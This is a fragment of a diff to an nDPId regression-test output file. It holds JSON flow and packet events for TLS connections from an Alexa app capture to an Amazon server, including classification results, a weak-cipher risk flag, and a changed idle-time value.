-00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1859,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":110,"flow_packet_id":1,"flow_last_seen":1490976114894,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976114894,"pkt":"AMDKkaPvePiC0\/vCCABFAAA88bJAAEAGVTysECrYNF7ohrKhAbvIHJqDAAAAAKAC\/\/\/RDQAAAgQFtAQCCAoA9msxAAAAAAEDAwg="} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1860,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976114906,"flow_last_seen":1490976114906,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976114906,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45730,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1860,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":111,"flow_packet_id":1,"flow_last_seen":1490976114906,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976114906,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8mqJAAEAGrEysECrYNF7ohrKiAbt67fGQAAAAAKAC\/\/\/HLQAAAgQFtAQCCAoA9msyAAAAAAEDAwg="} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1861,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976114921,"flow_last_seen":1490976114921,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976114921,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45731,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1861,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":112,"flow_packet_id":1,"flow_last_seen":1490976114921,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976114921,"pkt":"AMDKkaPvePiC0\/vCCABFAAA87MtAAEAGWiOsECrYNF7ohrKjAbuMuIf\/AAAAAKAC\/\/8e8QAAAgQFtAQCCAoA9ms0AAAAAAEDAwg="} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1862,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976114940,"flow_last_seen":1490976114940,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976114940,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45732,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1862,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":113,"flow_packet_id":1,"flow_last_seen":1490976114940,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976114940,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8CnJAAEAGPH2sECrYNF7ohrKkAbvN5GFHAAAAAKAC\/\/8EewAAAgQFtAQCCAoA9ms1AAAAAAEDAwg="} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1863,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":110,"flow_packet_id":2,"flow_last_seen":1490976115060,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976115060,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwcUdAAOcGLrM0XuiGrBAq2AG7sqGNgYNXyByahHASH\/5IZwAAAgQFtAEDAwY="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1864,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":109,"flow_packet_id":2,"flow_last_seen":1490976115061,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976115061,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwOTtAAOcGZr80XuiGrBAq2AG7sqDRCzchLZ\/QY3ASH\/61sgAAAgQFtAEDAwY="} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1865,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":111,"flow_packet_id":2,"flow_last_seen":1490976115061,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976115061,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwU4dAAOcGTHM0XuiGrBAq2AG7sqKEfV0Neu3xkXASH\/5t1gAAAgQFtAEDAwY="} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1866,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":112,"flow_packet_id":2,"flow_last_seen":1490976115061,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976115061,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwVCVAAOcGS9U0XuiGrBAq2AG7sqOllKPSjLiIAHASH\/5dvwAAAgQFtAEDAwY="} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1868,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":113,"flow_packet_id":2,"flow_last_seen":1490976115061,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976115061,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAw30dAAOcGwLI0XuiGrBAq2AG7sqRySquQzeRhSHASH\/5u1gAAAgQFtAEDAwY="} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1869,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":110,"flow_packet_id":3,"flow_last_seen":1490976115065,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976115065,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo8bNAAEAGVU+sECrYNF7ohrKhAbvIHJqEjYGDWFAQAVeS2AAA"} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1870,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":109,"flow_packet_id":3,"flow_last_seen":1490976115065,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976115065,"pkt":"AMDKkaPvePiC0\/vCCABFAAAou1NAAEAGi6+sECrYNF7ohrKgAbstn9Bj0Qs3IlAQAVcAJAAA"} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1871,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":111,"flow_packet_id":3,"flow_last_seen":1490976115066,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976115066,"pkt":"AMDKkaPvePiC0\/vCCABFAAAomqNAAEAGrF+sECrYNF7ohrKiAbt67fGRhH1dDlAQAVe4RwAA"} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1872,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":112,"flow_packet_id":3,"flow_last_seen":1490976115066,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976115066,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo7MxAAEAGWjasECrYNF7ohrKjAbuMuIgApZSj01AQAVeoMAAA"} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1873,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":113,"flow_packet_id":3,"flow_last_seen":1490976115066,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976115066,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoCnNAAEAGPJCsECrYNF7ohrKkAbvN5GFIckqrkVAQAVe5RwAA"} -00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1874,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976114894,"flow_last_seen":1490976115066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976115066,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45729,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1875,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976114885,"flow_last_seen":1490976115066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976115066,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45728,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1876,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976114906,"flow_last_seen":1490976115066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976115066,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45730,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1877,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976114921,"flow_last_seen":1490976115066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976115066,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45731,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1878,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976114940,"flow_last_seen":1490976115067,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976115067,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45732,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1879,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976114894,"flow_last_seen":1490976115189,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976115189,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45729,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1882,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976114906,"flow_last_seen":1490976115200,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976115200,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45730,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1883,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976114885,"flow_last_seen":1490976115200,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976115200,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45728,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1884,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976114921,"flow_last_seen":1490976115200,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976115200,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45731,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1888,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976114940,"flow_last_seen":1490976115201,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976115201,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45732,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1858,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976114885,"flow_last_seen":1490976114885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976114885,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45728,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1858,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":109,"flow_packet_id":1,"flow_last_seen":1490976114885,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976114885,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8u1JAAEAGi5ysECrYNF7ohrKgAbstn9BiAAAAAKAC\/\/81rgAAAgQFtAQCCAoA9mswAAAAAAEDAwg="} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1859,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976114894,"flow_last_seen":1490976114894,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976114894,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45729,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1859,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":110,"flow_packet_id":1,"flow_last_seen":1490976114894,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976114894,"pkt":"AMDKkaPvePiC0\/vCCABFAAA88bJAAEAGVTysECrYNF7ohrKhAbvIHJqDAAAAAKAC\/\/\/RDQAAAgQFtAQCCAoA9msxAAAAAAEDAwg="} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1860,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976114906,"flow_last_seen":1490976114906,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976114906,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45730,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1860,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":111,"flow_packet_id":1,"flow_last_seen":1490976114906,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976114906,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8mqJAAEAGrEysECrYNF7ohrKiAbt67fGQAAAAAKAC\/\/\/HLQAAAgQFtAQCCAoA9msyAAAAAAEDAwg="} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1861,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976114921,"flow_last_seen":1490976114921,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976114921,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45731,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1861,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":112,"flow_packet_id":1,"flow_last_seen":1490976114921,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976114921,"pkt":"AMDKkaPvePiC0\/vCCABFAAA87MtAAEAGWiOsECrYNF7ohrKjAbuMuIf\/AAAAAKAC\/\/8e8QAAAgQFtAQCCAoA9ms0AAAAAAEDAwg="} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1862,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976114940,"flow_last_seen":1490976114940,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976114940,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45732,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1862,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":113,"flow_packet_id":1,"flow_last_seen":1490976114940,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976114940,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8CnJAAEAGPH2sECrYNF7ohrKkAbvN5GFHAAAAAKAC\/\/8EewAAAgQFtAQCCAoA9ms1AAAAAAEDAwg="} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1863,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":110,"flow_packet_id":2,"flow_last_seen":1490976115060,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976115060,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwcUdAAOcGLrM0XuiGrBAq2AG7sqGNgYNXyByahHASH\/5IZwAAAgQFtAEDAwY="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1864,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":109,"flow_packet_id":2,"flow_last_seen":1490976115061,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976115061,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwOTtAAOcGZr80XuiGrBAq2AG7sqDRCzchLZ\/QY3ASH\/61sgAAAgQFtAEDAwY="} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1865,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":111,"flow_packet_id":2,"flow_last_seen":1490976115061,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976115061,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwU4dAAOcGTHM0XuiGrBAq2AG7sqKEfV0Neu3xkXASH\/5t1gAAAgQFtAEDAwY="} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1866,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":112,"flow_packet_id":2,"flow_last_seen":1490976115061,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976115061,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwVCVAAOcGS9U0XuiGrBAq2AG7sqOllKPSjLiIAHASH\/5dvwAAAgQFtAEDAwY="} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1868,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":113,"flow_packet_id":2,"flow_last_seen":1490976115061,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976115061,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAw30dAAOcGwLI0XuiGrBAq2AG7sqRySquQzeRhSHASH\/5u1gAAAgQFtAEDAwY="} 